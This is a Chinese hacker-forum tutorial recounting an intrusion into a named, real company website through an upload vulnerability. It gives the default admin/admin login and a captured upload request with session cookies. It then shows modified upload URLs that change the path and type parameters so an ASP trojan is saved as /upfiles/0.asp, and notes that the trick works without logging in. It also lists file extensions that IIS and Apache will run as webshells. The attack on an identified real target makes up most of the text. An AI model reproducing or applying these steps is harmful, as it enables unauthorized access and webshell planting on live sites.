上传漏洞之构造

来源：华夏黑客联盟：http://www.hxhack.com
声明：转载请注名版权，此文版权归华夏黑客联盟所有，转载请注明，谢谢！

上传无疑是最简洁的利用方法无需多费什么事情就可以拿下一个网站，以前的洞网上传漏洞不是闹的沸沸洋洋的啊，至此出现了很多上传漏洞。从网上一写文章可以看出上传漏洞出现的主要原因是：断意字符的出现以及web程序过滤不严两个方面。其实很多人都知道了这些方法，比如：nc提交伪造的数据包来上传，还有就是构造后缀名来利用服务器的解析支持（IIS环境下asp可以用asa、cer、htr、cdx来作为解析的文件类型||而在Apache环境下，pl类型文件以及php3、php4等文件类型也可以被用来制作成webshell）。不做详细说明了，都是老生常谈了。下面来看看我无意中入侵一个网站的方法（上传），其实很简单。
目标站：http://www.sukicosmetic.com.hk
开始的时候还是找注入，结果没有什么地方能给我注入的，我郁闷！
就随便在它站上看看，给我看到了一个图片， 一看就明白了肯定有上传的地方，开始猜它的地址了，怎么猜，呵呵，就是一些常见的上传地址呗，猜了半天也没有找到！不能放弃啊！找找后台看看，找了半天找到了它的后台地址
http://www.sukicosmetic.com.hk/manageweb/login.htm，呵呵心想有门了。没有它用户密码怎么办，试试它弱智密码看看 admin admin 果然进来了！运气真好，等下去买彩票了！~



直接随便看看，找了半天没有看到数据备份，看来只能找上传了，找啊找的，找了一个编辑器上传的地方和它网站自己带的一个上传的地方。编辑器的也就不多想了，估计没有什么用（结果给我猜中了，我弄了半天编辑器的还是没有成功它的编辑器是用Fckeditor编辑器—这个编辑器以前也有个洞，就是建目录的，自己去网上找找吧，我不多写了，打字也累的）
在产品管理里面有个上传的地方

建立文件夹没有什么用了，我试过了，唯一的就是上传，点开上传
随便传个asp木马上去看看，嘿嘿，肯定传不上去，我们还是传个图片 截个包分析下吧
POST /manageweb/system/manage.asp?action=upfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-silverlight, */*
Referer: http://www.sukicosmetic.com.hk/m ... if&formname=img
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d81d4813076e
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.sukicosmetic.com.hk
Content-Length: 46842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSBCTCBQ=JDBEAMBAJKGCHIPMNEEGNOCE; 9qu=level=0&uid=admin&id=1

嘿嘿看到什么吗？




构造一个上传。哈哈
http://www.sukicosmetic.com.hk/m ... if&formname=img
path=%2Fupfiles%2F0%2Ejpg&type=jpeg/jpg/png/gif&formname=img
把path换了结果如下
http://www.sukicosmetic.com.hk/m ... ?action=upfile& path=%2Fupfiles%2F0%2Ejpg &type=jpeg/jpg/png/gif&formname=img
jpg不是我们要的我们要他能传asp 再换换就成下面了
http://www.sukicosmetic.com.hk/m ... ?action=upfile& path=%2Fupfiles%2F0%2Easp &type=asp&formname=img
直接在IE中打开我们构造的地址看看能不能传asp了
记得把我们的asp木马改成0.asp哦

点上传结果没有提示错误也没有提示成功！我们到底成功了吗？传上去的地址是什么呢？
我们构造的路径是upfiles/0.asp 那我们就来试下
http://www.sukicosmetic.com.hk/upfiles/0.asp
结果说明我们成功了
  
输入密码进去看看

嘿嘿说明我们构造是完全正确的，后来我推出登陆清空cookies，又用我们构造的地址上传另一个，说明我们不用它管理密码也可以直接上传的！好了就到这吧！以上有错误的地方还请大牛们指正！大家不要去破坏哦！现在还在严打呢。